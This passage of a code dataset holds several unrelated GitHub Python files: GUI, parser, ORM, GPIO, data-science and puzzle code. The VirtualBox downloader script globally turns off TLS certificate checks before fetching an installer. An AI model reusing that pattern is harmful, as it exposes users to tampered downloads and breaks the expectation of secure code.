='Progress')\n\nbar_var = tk.DoubleVar()\nbar_var.set(i)\nbar_progress = ttk.Progressbar(frame_additional,variable=bar_var,maximum=10)\n\n### layout\n\nlabel_additional.grid(sticky='we',rowspan=2)\n\nbutton_command.grid(sticky=\"we\",rowspan=2)\nlabel_command.grid(sticky='we')\n\nlabel_progress.grid(sticky='we')\nbar_progress.grid(sticky='we')\n\n##TERMINAL frame\n\n### widgets\n\n#tkTerminal = tk.Label(mainWindow, bg = \"red\",text=\"Terminal\")\n\n#tkTerminal.grid(row=6,column=1,sticky=\"nswe\",rowspan=3)\n\n### layout\n\n#tkAdditional.grid(row=6,column=0,sticky=\"we\")\n\n## 
GERAL\nframe_operation.grid()\nframe_additional.grid()\n\nmainWindow.mainloop()","repo_name":"rodrigodbernardo/PIBITI-2019_mqtt-ver","sub_path":"code/test/python-tkinter/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3468,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"69964673509","text":"from enum import Enum, auto\n\n\nclass TokenType(Enum):\n # Single-character tokens.\n LEFT_PAREN = auto()\n RIGHT_PAREN = auto()\n LEFT_BRACE = auto()\n RIGHT_BRACE = auto()\n LEFT_BRACKET = auto()\n RIGHT_BRACKET = auto()\n\n COMMA = auto()\n DOT = auto()\n MINUS = auto()\n PLUS = auto()\n SEMICOLON = auto()\n SLASH = auto()\n STAR = auto()\n QUESTION_MARK = auto()\n COLON = auto()\n\n # One or two character tokens.\n BANG = auto()\n BANG_EQUAL = auto()\n\n EQUAL = auto()\n EQUAL_EQUAL = auto()\n\n GREATER = auto()\n GREATER_EQUAL = auto()\n\n LESS = auto()\n LESS_EQUAL = auto()\n\n # Literals.\n IDENTIFIER = auto()\n STRING = auto()\n NUMBER = auto()\n\n # Keywords.\n AND = auto()\n BREAK = auto()\n CLASS = auto()\n ELSE = auto()\n FALSE = auto()\n FUN = auto()\n FOR = auto()\n IF = auto()\n NIL = auto()\n OR = auto()\n\n PRINT = auto()\n RETURN = auto()\n SUPER = auto()\n THIS = auto()\n TRUE = auto()\n VAR = auto()\n WHILE = auto()\n\n EOF = auto()\n\n\nEQUALITY_TOKENS = (\n TokenType.BANG_EQUAL,\n TokenType.EQUAL_EQUAL\n)\n\nCOMPARISON_TOKENS = (\n TokenType.GREATER,\n TokenType.GREATER_EQUAL,\n TokenType.LESS,\n TokenType.LESS_EQUAL\n)\n\nADDITION_TOKENS = (\n TokenType.MINUS,\n TokenType.PLUS\n)\n\nMULTIPLICATION_TOKENS = (\n TokenType.SLASH,\n TokenType.STAR\n)\n\nKEYWORD_TOKENS = (\n TokenType.BREAK,\n TokenType.CLASS,\n TokenType.FUN,\n TokenType.VAR,\n TokenType.FOR,\n TokenType.IF,\n TokenType.WHILE,\n TokenType.PRINT,\n TokenType.RETURN\n)\n","repo_name":"jepebe/plox","sub_path":"plox/token_type.py","file_name":"token_type.py","file_ext":"py","file_size_in_byte":1584,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"13070781747","text":"\"\"\"\nThis PEG parser is made up of three core functions: _atom, _choice and _sequence\nEach corresponds to that type of PEG rule, and returns one of the following:\n None - the tokens did not match the rule\n ParseTree(None, []) - the lookahead succeeded or optional atom matched nothing\n ParseTree(None, [...]) - the tokens matched a sub-rule (defined with `()`)\n ParseTree(str name, [...]) - the tokens matched a named rule\n str - this atom was matched\n\nParseTrees are combined with the .add function, making named rules sub-trees\nand collapsing down sub-rules to a flat level.\nRules that start with _ are also collapsed.\nRules have tailing _ stripped.\n\nThe grammar is a dictionary mapping rules to functions which implement it. 
The\nsyntax is similar to standard PEG with the addition of $type which matches any\ntokens of a certain type.\n\"\"\"\n\nclass ParseTree:\n def __init__(self, rule=None, children=None):\n self.rule = rule\n self.children = []\n self.length = 0\n for child in (children or []):\n self.add(child)\n\n def add(self, res):\n if isinstance(res, int):\n raise TypeError\n if isinstance(res, ParseTree):\n self.length += res.length\n if res.rule is None or res.rule[0] == \"_\":\n self.children += res.children\n else:\n self.children.append(res)\n else:\n self.children.append(res)\n self.length += 1\n\n def print(self, depth):\n res = \" \" * depth + \"P\" + str(self.rule) + \"\\n\"\n for child in self.children:\n if isinstance(child, str):\n res += \" \" * (depth + 1) + child + \"\\n\"\n else:\n res += child.print(depth + 1)\n return res\n\n def __repr__(self):\n return self.print(0)\n\n# memoization decorator\ndef memo(fn):\n called = {}\n def wrapper(tokens):\n t = tuple(t.val for t in tokens)\n if t not in called:\n called[t] = fn(tokens)\n return called[t]\n return wrapper\n\n# Matches first option\ndef choice(options):\n @memo\n def _choice(tokens):\n for option in options:\n res = option(tokens)\n if res is not None:\n return res\n return None\n return _choice\n\n# Matches all of passed rules or none\ndef sequence(rules):\n @memo\n def _sequence(tokens):\n total = ParseTree()\n for rule in rules:\n res = rule(tokens[total.length:])\n if res is None:\n return None\n total.add(res)\n return total\n return _sequence\n\n# Implements an atom (a string literal or a reference to a rule) with optional\n# modifiers (*, !, ?, etc). Rule is a tuple of (modifier, value)\ndef atom(rule):\n # determines if tokens matches the rule, ignoring modifiers.\n def _trueAtom(tokens):\n if isinstance(rule[1], str):\n if rule[1][0] == \"'\" and rule[1][-1] == \"'\":\n if rule == \"''\":\n return \"\"\n if len(tokens) > 0 and tokens[0] == rule[1][1:-1]:\n return rule[1][1:-1]\n return None\n if rule[1][0] == \"$\":\n if len(tokens) > 0 and tokens[0].type == rule[1][1:]:\n return tokens[0].val\n return None\n res = grammar[rule[1]](tokens)\n if res is None:\n return None\n return ParseTree(rule[1].rstrip(\"_\"), [res])\n return rule[1](tokens)\n\n # determines if tokens matches the rule, including modifiers.\n @memo\n def _atom(tokens):\n if rule[0] is None:\n return _trueAtom(tokens)\n if rule[0] == \"?\":\n return _trueAtom(tokens) or ParseTree()\n total = ParseTree()\n if rule[0] == \"+\":\n res = _trueAtom(tokens)\n if res is None:\n return None\n total.add(res)\n if rule[0] in \"+*\":\n while True:\n res = _trueAtom(tokens[total.length:])\n if res is None:\n return total\n total.add(res)\n if rule[0] == \"&\":\n if _trueAtom(tokens) is None:\n return None\n return ParseTree()\n if rule[0] == \"!\":\n if _trueAtom(tokens) is None:\n return ParseTree()\n return None\n raise AssertionError(\"rule was \" + str(rule))\n return _atom\n\n# only split string at splitter when not in a quote and at the lowest (depth)\ndef smartSplit(string, splitter):\n res = []\n last = 0\n depth = 0\n inQuote = False\n for i, c in enumerate(string):\n if c == \"'\":\n inQuote = not inQuote\n elif not inQuote and c == \"(\":\n depth += 1\n elif not inQuote and c == \")\":\n depth -= 1\n else:\n if not inQuote and depth == 0 and c == splitter:\n res.append(string[last:i])\n last = i + 1\n res.append(string[last:])\n return res\n\n# called on the text of each rule (and sub-rule). 
Splits it into choices / atoms\n# and wraps the related functions.\ndef _load(text):\n def _atom(text):\n if text[0] in \"&!\":\n res = [text[0], text[1:]]\n elif text[-1] in \"?+*\":\n res = [text[-1], text[:-1]]\n else:\n res = [None, text]\n if res[1][0] == \"(\" and res[1][-1] == \")\":\n res[1] = _load(res[1][1:-1])\n return atom(res)\n def _sequence(text):\n res = []\n for s in smartSplit(text, \" \"):\n res.append(_atom(s.strip()))\n return sequence(res)\n res = choice([_sequence(c.strip()) for c in smartSplit(text, \"/\")])\n return res\n\n# load the grammar\ngrammar = {}\ndef load(text):\n rules = {}\n for line in text.splitlines():\n if line.strip() == '':\n continue\n name, rule = line.split(\"=\", 1)\n rules[name.strip()] = rule.strip()\n for name, rule in rules.items():\n grammar[name.strip()] = _load(rule.strip())\n\ndef parse(tokens, rule=\"BLOCKS\"):\n res = grammar[rule](tokens)\n res.rule = rule\n return res\n\nwith open(\"grammar.txt\") as f:\n load(f.read())\n","repo_name":"BluCodeGH/willow","sub_path":"grammar.py","file_name":"grammar.py","file_ext":"py","file_size_in_byte":5518,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"71"} +{"seq_id":"16620271808","text":"#!/usr/bin/python3\n'''script for task 8'''\n\nimport sys\nfrom model_state import State\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.pool import NullPool\n\n\nif __name__ == '__main__':\n\n engine = create_engine('mysql+mysqldb://{}:{}@{}:{}/{}'.format(\n sys.argv[1], sys.argv[2], 'localhost', '3306', sys.argv[3]),\n pool_pre_ping=True, poolclass=NullPool)\n Session = sessionmaker(bind=engine)\n local_session = Session()\n result = local_session.query(State).order_by(State.id).first()\n local_session.close()\n\n if result:\n print('{}: {}'.format(result.id, result.name))\n else:\n print('Nothing')\n","repo_name":"AbdulMah/alx-higher_level_programming","sub_path":"0x0F-python-object_relational_mapping/8-model_state_fetch_first.py","file_name":"8-model_state_fetch_first.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"27417520330","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom pathlib import Path\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nfrom urllib.request import urlretrieve\nimport re\nimport ssl\nssl._create_default_https_context = ssl._create_unverified_context\n\n\n#%%\ndef find_last_ed(url, version_digit,sub_digit):\n#version_digit,sub_digit = 5,3\n html = urlopen(url)\n soup = BeautifulSoup(html.read(), 'lxml')\n maximum = 0\n for link in soup.find_all('a', href=True):\n dlink = link.get('href')\n dlink = re.sub(r'/', r'', dlink)\n vlink = dlink\n dlink=dlink.split('.')\n if len(dlink)==3:\n if int(dlink[0])==version_digit:\n if int(dlink[1])==sub_digit:\n #print(dlink[2])\n try:\n results = list(map(int, dlink))\n print(vlink)\n maximum = max(maximum, results[2])\n except:\n pass\n print('==')\n url2 = 'https://download.virtualbox.org/virtualbox/'+ str(version_digit) + '.' 
+ str(sub_digit) + '.'+str(maximum)\n html = urlopen(url2)\n soup = BeautifulSoup(html.read(), 'lxml')\n for link in soup.find_all('a', href=True):\n dlink = link.get('href')\n if 'VBoxGuestAdditions' in dlink:\n url3 = url2+'/'+dlink\n link_name = dlink\n print(url3)\n return(url3, link_name)\n\nurl = 'https://download.virtualbox.org/virtualbox/'\nurl3, link_name = find_last_ed(url,6,0) \n#%%\nurlretrieve(url3, str(Path.home())+'/Downloads/'+link_name)\n","repo_name":"blucap/GetOracleVBoxGuestAdditions","sub_path":"oracle_guest.py","file_name":"oracle_guest.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"10755315831","text":"\"\"\"General utility functions.\"\"\"\r\n\r\nimport wx, application\r\n\r\ndef do_error(message, title = 'Error', style = None):\r\n \"\"\"Display an error message.\"\"\"\r\n if style is None:\r\n style = wx.ICON_EXCLAMATION\r\n return wx.MessageBox(str(message), str(title), style = style)\r\n\r\ndef create_editor(filename = None):\r\n \"\"\"Create a new editor.\"\"\"\r\n editor = EditorFrame()\r\n if filename is not None:\r\n editor.load_file(filename)\r\n editor.Show(True)\r\n editor.Maximize(True)\r\n application.editors.append(editor)\r\n return editor\r\n\r\nfrom .editor import EditorFrame\r\n","repo_name":"chrisnorman7/dotsmith","sub_path":"gui/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"36084514536","text":"#!/usr/bin/env python\nimport os\nimport sys\nimport numpy as np\n# ROS packages\nimport rospy\nimport rospkg\nfrom sensor_msgs.msg import Imu\n# Our packages\nfrom stopwatch import StopWatch # noqa: E402\nfrom storage import StaticPoseData, DynamicPoseData # noqa: E402\nfrom hiro_ros_arm_controller.RobotController import PandaController # noqa: E402\nROS_ROBOTIC_SKIN_PATH = rospkg.RosPack().get_path('ros_robotic_skin')\nsys.path.append(os.path.join(ROS_ROBOTIC_SKIN_PATH, 'scripts'))\nimport utils # noqa: E402\n\nRATE = rospy.get_param('/dynamic_frequency')\nSIM_DT = 1.0 / RATE\nSTATIC_MOTION_RECORD_TIME = 3.0\nDYNAMIC_MOTION_RECORD_TIME = rospy.get_param('/oscillation_time')\nFREQS = rospy.get_param('/oscillation_frequency')\nAMPLITUDES = rospy.get_param('/oscillation_magnitude')\nIS_SIM = rospy.get_param('/is_sim')\nREST_TIME = rospy.get_param('/rest_time')\n\n\nclass DataCollector:\n \"\"\"\n Class for collecting dynamic pose data and save them as a pickle file\n \"\"\"\n def __init__(self, controller, poses_list, is_sim=True,\n savedir='data',\n static_filename='static_data.pickle',\n dynamic_filename='dynamic_data.pickle',\n ):\n \"\"\"\n Initializes DataCollector class.\n\n Arguments\n -----------\n controller:\n Wrapped controller to control either a robot.\n poses_list: list\n A list of poses. 
Each pose is a list.\n It includes 7 joint position, 7 joint velociites, and Pose name\n filepath: str\n File path to save the collected data\n \"\"\"\n self.controller = controller\n self.poses_list = poses_list\n self.is_sim = is_sim\n # constant\n self.pose_names = [pose[2] for pose in poses_list]\n self.joint_names = map(str, self.controller.joint_names)\n\n # get imu names and topics through rostopic and xacro.\n self.imu_names, self.imu_topics = utils.get_imu_names_and_topics()\n\n self.curr_pose_name = self.pose_names[0]\n self.curr_joint_name = self.joint_names[0]\n self.prev_angular_velocity = 0.0\n\n self.watch_dt = StopWatch()\n self.watch_dynamic_motion = StopWatch()\n self.watch_static_motion = StopWatch()\n\n self.r = rospy.Rate(RATE)\n self.sim_dt = 1.0/RATE\n\n # data storage\n static_filename = os.path.join(savedir, static_filename)\n dynamic_filename = os.path.join(savedir, dynamic_filename)\n self.static_acceleration_storage = StaticPoseData(self.pose_names, self.imu_names, static_filename)\n self.dynamic_acceleration_storage = DynamicPoseData(self.pose_names, self.joint_names, self.imu_names, dynamic_filename)\n # Subscribe to IMUs\n for imu_topic in self.imu_topics:\n rospy.Subscriber(imu_topic, Imu, self.callback)\n\n def callback(self, data):\n \"\"\"\n A callback function for IMU topics\n\n Arguments\n ----------\n data: sensor_msgs.msg.Imu\n IMU data. Please refer to the official documentation.\n http://docs.ros.org/melodic/api/sensor_msgs/html/msg/Imu.html\n \"\"\"\n if self.watch_static_motion.is_started():\n acceleration = utils.Vector3_to_np(data.linear_acceleration)\n quaternion = utils.Quaternion_to_np(data.orientation)\n joint_angles = self.controller.joint_angles\n\n self.static_acceleration_storage.append(\n pose_name=self.curr_pose_name, # for each defined initial pose\n imu_name=data.header.frame_id, # frame id of imu\n data=np.r_[\n quaternion,\n acceleration,\n joint_angles\n ]\n )\n\n if self.watch_dynamic_motion.is_started():\n acceleration = utils.Vector3_to_np(data.linear_acceleration)\n\n dt = self.watch_dt.get_elapsed_time()\n self.watch_dt.restart()\n if self.is_sim and dt <= 0.9*self.sim_dt:\n return\n\n curr_angular_velocity = self.controller.joint_velocity(self.curr_joint_name)\n angular_acceleration = (curr_angular_velocity - self.prev_angular_velocity) / dt\n self.prev_angular_velocity = curr_angular_velocity\n\n joint_angles = self.controller.joint_angles\n\n # time\n t = self.watch_dynamic_motion.get_elapsed_time()\n self.dynamic_acceleration_storage.append(\n pose_name=self.curr_pose_name, # for each defined initial pose\n joint_name=self.curr_joint_name, # for each excited joint\n imu_name=data.header.frame_id, # for each imu\n data=np.r_[\n acceleration,\n joint_angles,\n t,\n angular_acceleration,\n AMPLITUDES[0], # Need to remove this later.\n curr_angular_velocity,\n ]\n )\n\n def goto_defined_pose(self, pose, rest_time, log=True):\n positions, _, pose_name = pose[0], pose[1], pose[2] # noqa: F841\n # first, move to the position from _positions.txt\n # TODO: We have to ensure that commanded positions are reached\n # Then REST_TIME should start once it reached the goal.\n self.controller.publish_positions(positions, sleep=rest_time)\n\n self.curr_pose_name = pose_name\n if log:\n print(\n 'At Position: ' + pose_name,\n map(int, np.rad2deg(np.array(positions)))\n )\n\n def record_static_motion(self, static_motion_record_time=3):\n self.watch_static_motion.start()\n rospy.sleep(static_motion_record_time)\n 
self.watch_static_motion.stop()\n\n def prepare_prev_states(self, joint_name):\n # Prepare for publishing velocities\n self.curr_joint_name = joint_name\n # Get current joint velocity\n self.prev_angular_velocity = self.controller.joint_velocity(self.curr_joint_name)\n\n def start_watches(self, dynamic_motion_record_time):\n # Start motion and recording\n self.watch_dt.start()\n self.watch_dynamic_motion.set_timer(dynamic_motion_record_time)\n self.watch_dynamic_motion.start()\n\n def collect_data(self, amplitudes, freqs, rest_time,\n static_motion_record_time,\n dynamic_motion_record_time):\n \"\"\"\n This will move the joint of the robot arm like a sine wave\n for all joints for all defined poses.\n \"\"\"\n self.controller.set_joint_position_speed(speed=1.0)\n\n for pose in self.poses_list:\n self.goto_defined_pose(pose, rest_time)\n # Record for given time\n # import time\n # time.sleep(100)\n self.record_static_motion(static_motion_record_time)\n\n for i, joint_name in enumerate(self.joint_names):\n # Go to current setting position\n if i != 0:\n self.goto_defined_pose(pose, rest_time, log=False)\n\n # Prepare for recording dynamic motion\n self.prepare_prev_states(joint_name)\n self.start_watches(dynamic_motion_record_time)\n\n velocities = np.zeros(len(self.joint_names))\n while True:\n # time within motion\n t = self.watch_dynamic_motion.get_elapsed_time()\n\n # Oscillated Velocity pattern\n velocities[i] = amplitudes[i] * np.sin(2 * np.pi * freqs[i] * t)\n self.controller.send_velocities(velocities)\n\n if self.watch_dynamic_motion.is_ended():\n break\n\n if rospy.is_shutdown():\n return\n self.r.sleep()\n\n self.watch_dynamic_motion.stop()\n rospy.sleep(0.1)\n\n def save(self, save=True, verbose=False, clean_static=True, clean_dynamic=True):\n \"\"\"\n Save data to a pickle file.\n\n\n Arguments\n ----------\n `save`: `bool`\n If the data will be saved\n\n `verbose`: `bool`\n \"\"\"\n if clean_static:\n static_data = self.static_acceleration_storage.clean_data(verbose)\n else:\n static_data = self.static_acceleration_storage.data\n\n if clean_dynamic:\n dynamic_data = self.dynamic_acceleration_storage.clean_data(verbose)\n else:\n dynamic_data = self.dynamic_acceleration_storage.data\n\n if save:\n rospy.loginfo('saving')\n self.static_acceleration_storage.save(static_data)\n self.dynamic_acceleration_storage.save(dynamic_data)\n\n\nif __name__ == '__main__':\n rospy.init_node('data_collection')\n\n controller = PandaController(is_sim=IS_SIM)\n filename = 'panda_positions.txt'\n\n poses_list = utils.get_poses_list_file(filename)\n\n savedir = os.path.join(ROS_ROBOTIC_SKIN_PATH, 'data')\n static_filename = 'static_data_panda.pickle'\n dynamic_filename = 'dynamic_data_panda.pickle'\n\n data_collector = DataCollector(\n controller=controller,\n poses_list=poses_list,\n is_sim=IS_SIM,\n savedir=savedir,\n static_filename=static_filename,\n dynamic_filename=dynamic_filename\n )\n\n data_collector.collect_data(\n amplitudes=AMPLITUDES,\n freqs=FREQS,\n rest_time=REST_TIME,\n static_motion_record_time=STATIC_MOTION_RECORD_TIME,\n dynamic_motion_record_time=DYNAMIC_MOTION_RECORD_TIME\n )\n data_collector.save(save=True, verbose=False)\n","repo_name":"HIRO-group/ros_robotic_skin","sub_path":"scripts/data_generation/collect_data.py","file_name":"collect_data.py","file_ext":"py","file_size_in_byte":9714,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"2479014348","text":"\"\"\"LED wrapper class\"\"\"\nimport threading\nimport 
time\nfrom RPi import GPIO\n\nclass Led:\n \"\"\"LED wrapper class\"\"\"\n def __init__(self, id_, pwm):\n GPIO.setup(id_, GPIO.OUT)\n\n if pwm:\n self.pwm = GPIO.PWM(id_, 50)\n self.brightness = 50\n else:\n self.pwm = pwm\n self.brightness = 0\n\n self.id_ = id_\n self.state = GPIO.LOW\n self.update_status()\n\n def set_pwm(self, state):\n \"\"\"Enable or disable PWM on the pin\"\"\"\n if state:\n if self.pwm:\n return self.get_status()\n self.pwm = GPIO.PWM(self.id_, 50)\n if self.state == GPIO.HIGH:\n self.pwm.start(100)\n else:\n self.pwm.start(0)\n else:\n if not self.pwm:\n return self.get_status()\n self.pwm.stop()\n self.pwm = False\n return self.get_status()\n\n def led_on(self):\n \"\"\"Turn LED on\"\"\"\n if self.state == GPIO.HIGH:\n return self.get_status()\n\n self.state = GPIO.HIGH\n return self.update_status()\n\n def led_off(self):\n \"\"\"Turn LED off\"\"\"\n if self.state == GPIO.LOW:\n return self.get_status()\n\n self.state = GPIO.LOW\n return self.update_status()\n\n def led_toggle(self):\n \"\"\"Set LED to opposite state\"\"\"\n if self.state == GPIO.LOW:\n self.state = GPIO.HIGH\n else:\n self.state = GPIO.LOW\n return self.update_status()\n\n def led_blink(self, duration=.5):\n \"\"\"Blink a LED\"\"\"\n self.led_toggle()\n time.sleep(duration)\n return self.led_toggle()\n\n def _pwm_on(self):\n for dc in range(0, 101, 5):\n self.set_brightness(dc)\n time.sleep(0.01)\n\n def _pwm_off(self):\n for dc in range(100, -1, -5):\n self.set_brightness(dc)\n time.sleep(0.01)\n\n def get_status(self):\n \"\"\"Get LED status\"\"\"\n if not self.pwm:\n pwm = self.pwm\n else:\n pwm = True\n\n return {\n 'id': self.id_,\n 'state': self.state,\n 'pwm': pwm\n }\n\n def update_status(self):\n \"\"\"Update the LED according to state\"\"\"\n if self.pwm:\n if self.state == GPIO.HIGH:\n thread = threading.Thread(target=self._pwm_on, args=())\n thread.start()\n elif self.state == GPIO.LOW:\n thread = threading.Thread(target=self._pwm_off, args=())\n thread.start()\n else:\n GPIO.output(self.id_, self.state)\n\n return self.get_status()\n\n def set_brightness(self, brightness):\n \"\"\"Set the brightness of a PWM enabled LED, and update the local state\"\"\"\n if (self.pwm):\n self.brightness = brightness\n self.pwm.ChangeDutyCycle(brightness)\n\n","repo_name":"joms/ledmastree","sub_path":"backend/classes/led.py","file_name":"led.py","file_ext":"py","file_size_in_byte":2923,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"71"} +{"seq_id":"18449614472","text":"from typing import Dict, Any, Union\nfrom pydantic import BaseModel\n\nfrom src.assembly_point__db.helpers.add_full_report import add_full_report\nfrom src.assembly_point__db.helpers.add_test_descr import add_new_test_descr, last_test_descr_id\n\n\nclass ReportAddResponse(BaseModel):\n data: Dict[str, Union[int, str]]\n stand: int\n\n\ndef api_report_add(data: Dict[str, Any]) -> Dict[str, Any]:\n stand = data['stend']\n cmd = data['data']['cmd']\n start = data['data']['start']\n serial = data['data']['serial']\n mac = data['data']['mac']\n errors = data['data']['errors']\n text = data['data']['text']\n add_new_test_descr(start=start, serial=serial, mac=mac, errors=errors, stend_id=stand)\n add_full_report(string=text)\n data = {\n \"test_id\": last_test_descr_id(),\n \"cmd\": cmd\n }\n result = ReportAddResponse(data=data, stand=stand).dict()\n return 
result\n","repo_name":"ArturManuilenko/stands-db-api","sub_path":"src/assembly_point__api/routes/api__old_report_add.py","file_name":"api__old_report_add.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"19125651728","text":"import abc\nfrom typing import Any, Union\n\nimport numpy as np\nimport scipy.sparse as sp\n\nfrom cellrank import logging as logg\nfrom cellrank._utils._utils import _connected, _get_neighs, _symmetric\n\n__all__ = [\"ConnectivityMixin\", \"UnidirectionalMixin\", \"BidirectionalMixin\"]\n\n\nclass ConnectivityMixin:\n \"\"\"Mixin class that reads kNN connectivities and allows for density normalization.\"\"\"\n\n def _read_from_adata(\n self,\n conn_key: str = \"connectivities\",\n check_connectivity: bool = False,\n check_symmetric: bool = True,\n **kwargs: Any,\n ) -> None:\n super()._read_from_adata(**kwargs)\n self._conn_key = conn_key\n conn = _get_neighs(self.adata, mode=\"connectivities\", key=conn_key)\n self._conn = sp.csr_matrix(conn).astype(np.float64, copy=False)\n\n if check_connectivity and not _connected(self.connectivities):\n logg.warning(\"kNN graph is not connected\")\n if check_symmetric and not _symmetric(self.connectivities):\n logg.warning(\"kNN graph is not symmetric\")\n\n def _density_normalize(self, matrix: Union[np.ndarray, sp.spmatrix]) -> Union[np.ndarray, sp.spmatrix]:\n \"\"\"\n Density normalization by the underlying kNN graph.\n\n Parameters\n ----------\n matrix\n Matrix to normalize.\n\n Returns\n -------\n Density normalized matrix.\n \"\"\"\n logg.debug(\"Density normalizing the transition matrix\")\n\n q = np.asarray(self.connectivities.sum(axis=0)).squeeze()\n Q = sp.spdiags(1.0 / q, 0, matrix.shape[0], matrix.shape[0])\n\n return Q @ matrix @ Q\n\n @property\n def connectivities(self) -> sp.csr_matrix:\n \"\"\"Underlying connectivity matrix.\"\"\"\n return self._conn\n\n\nclass UnidirectionalMixin:\n \"\"\"Mixin specifying that its kernel doesn't is directionless.\"\"\"\n\n @property\n def backward(self) -> None:\n \"\"\"None.\"\"\"\n\n\nclass BidirectionalMixin(abc.ABC):\n \"\"\"Mixin specifying that its kernel has forward or backward directions.\"\"\"\n\n def __init__(self, *args: Any, backward: bool = False, **kwargs: Any):\n super().__init__(*args, **kwargs)\n if not isinstance(backward, (bool, np.bool_)):\n raise TypeError(f\"Expected `backward` to be `bool`, found `{type(backward).__name__}`.\")\n self._backward = bool(backward)\n self._init_kwargs[\"backward\"] = backward\n\n @abc.abstractmethod\n def __invert__(self) -> \"BidirectionalMixin\":\n pass\n\n @property\n def backward(self) -> bool:\n \"\"\"Direction of the process.\"\"\"\n return self._backward\n","repo_name":"theislab/cellrank","sub_path":"src/cellrank/kernels/mixins/_kernel.py","file_name":"_kernel.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","stars":272,"dataset":"github-code","pt":"71"} +{"seq_id":"31759570289","text":"#!/usr/bin/env python3\nfrom brain_games.game_logics.body_game_logic import body_game_displaying\nfrom brain_games.games.progression import get_progression\n\n'''Send rules of the game and function of the game into 'body_game_displaying'''\n\n\ndef main():\n game_rules = \"What number is missing in the progression?\"\n game_function = get_progression\n body_game_displaying(game_rules, game_function)\n\n\nif __name__ == '__main__':\n 
main()\n","repo_name":"NoFate35/python-project-49","sub_path":"brain_games/scripts/brain_progression.py","file_name":"brain_progression.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"3061275699","text":"import functools\nfrom utils import aoc\nfrom collections import defaultdict\n\n\ndef parse_input() -> set[complex]:\n scan = aoc.get_input(\"23\")\n return {\n x + 1j * y\n for y, line in enumerate(scan)\n for x, c in enumerate(line)\n if c == \"#\"\n }\n\n\ndef find_neighbors(elf: complex) -> list[complex]:\n return [\n elf - 1,\n elf + 1,\n elf - 1j,\n elf + 1j,\n elf + 1 + 1j,\n elf + 1 - 1j,\n elf - 1 + 1j,\n elf - 1 - 1j,\n ]\n\n\ndef find_moves(elf: complex) -> list:\n return [\n [[elf - 1j, elf + 1 - 1j, elf - 1 - 1j], elf - 1j],\n [[elf + 1j, elf + 1 + 1j, elf - 1 + 1j], elf + 1j],\n [[elf - 1 + 1j, elf - 1 - 1j, elf - 1], elf - 1],\n [[elf + 1 + 1j, elf + 1 - 1j, elf + 1], elf + 1],\n ]\n\n\ndef move(grid: set[complex], elf: complex, n_round: int) -> complex:\n elf_neighbors = find_neighbors(elf)\n elf_moves = find_moves(elf)\n\n if all(not neighbor in grid for neighbor in elf_neighbors):\n return elf\n\n for i in range(n_round, n_round + 4):\n if all(move not in grid for move in elf_moves[i % len(elf_moves)][0]):\n return elf_moves[i % len(elf_moves)][1]\n\n return elf\n\n\ndef play(grid: set[complex], n_round: int) -> tuple[set[complex], bool]:\n moved = False\n moves = defaultdict(list)\n new_grid = set()\n\n for elf in grid:\n new_elf = move(grid, elf, n_round)\n if new_elf != elf:\n moved = True\n moves[new_elf].append(elf)\n\n for k, v in moves.items():\n if len(v) == 1:\n new_grid.add(k)\n else:\n new_grid.update(v)\n\n return new_grid, moved\n\n\ndef part1() -> float:\n grid = parse_input()\n for round_n in range(10):\n grid, _ = play(grid, round_n)\n imaginaries = sorted([i.imag for i in grid])\n reals = sorted([i.real for i in grid])\n return (reals[-1] - reals[0] + 1) * (1 + imaginaries[-1] - imaginaries[0]) - len(\n grid\n )\n\n\n@functools.cache\ndef part2() -> int:\n moved = True\n grid = parse_input()\n round_n = 0\n\n while moved:\n grid, moved = play(grid, round_n)\n round_n += 1\n\n return round_n\n\n\nif __name__ == \"__main__\":\n print(part1())\n print(part2())\n","repo_name":"masmeert/advent-of-code","sub_path":"2022/23.py","file_name":"23.py","file_ext":"py","file_size_in_byte":2250,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"71"} +{"seq_id":"23184331798","text":"from django.shortcuts import render , redirect\nfrom django.http import HttpResponse\nfrom .models import Applicants\nfrom companies.models import Company\n\n\ndef create(request):\n if request.method == \"POST\":\n firstName = request.POST[\"firstName\"]\n lastName = request.POST[\"lastName\"]\n age = int(request.POST[\"age\"])\n education = request.POST[\"education\"]\n experience = request.POST[\"experience\"]\n gender = request.POST[\"gender\"]\n computer = request.POST[\"ability\"]\n\n\n\n if computer == \"YES\":\n computer = 1\n else:\n computer = 0\n \n applicant = Applicants.objects.create(firstName = firstName,lastName = lastName, age = age, education = education , experience = experience , gender = gender , computer = computer )\n\n return redirect(\"applicants\")\n else:\n\n companies = Company.objects.filter(available = True)\n\n return render(request,\"applicants/create.html\")\n\ndef applicants(request):\n applicants = 
